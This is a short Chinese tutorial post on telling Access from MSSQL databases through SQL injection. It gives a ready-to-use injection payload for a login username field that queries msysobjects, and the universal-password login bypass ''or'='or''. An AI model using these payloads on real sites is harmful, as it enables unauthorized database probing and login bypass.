SqlServer教程
判断Access与mssql数据库
本文主要是介绍判断Access与mssql数据库,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
构造payload:
username=123123'+and+(select+count(*)+from+msysobjects)>0+and+'a'='a--
通过and (select count(*)+from msysobjects)>0 进行判断
and (select count(*)+from msysobjects)>0 :返回权限不足为Access数据库
and (select count(*)+from msysobjects)>0 :返回正常则为MSSQL数据库
通过SQL注入漏洞,使用万能密码(‘or’=’or’)成功登陆
这篇关于判断Access与mssql数据库的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
您可能喜欢
-
Docker下的SqlServer发布订阅启用01-08
-
Docker安装MS SQL Server并使用Navicat远程连接06-05
-
深入浅出 SQL Server CDC 数据同步05-25
-
通过空间占用和执行计划了解SQL Server的行存储索引05-12
-
以SQLserver为例的Dapper详细讲解04-24
-
SQL server高级函数查询11-30
-
SQL SERVER数据库服务器CPU不能全部利用原因分析11-26
-
SQL Server 时间算差值/常用函数11-21
-
调试Archery连接SQL Server提示驱动错误11-20
-
SQL Server 完整、差异备份+完整、差异还原(详细讲解,规避错误)10-22
-
SQL Server、Access、Oracle数据库之优缺点对比10-22
-
sql获取服务器系统时间(SQL Server取系统当前时间)10-19
-
sqlserver数据库端口号配置10-17
-
若依前后端分离版切换数据库方法,以切换sqlServer为例[超详细]09-30
-
SqlServer对表的基本操作09-17
栏目导航
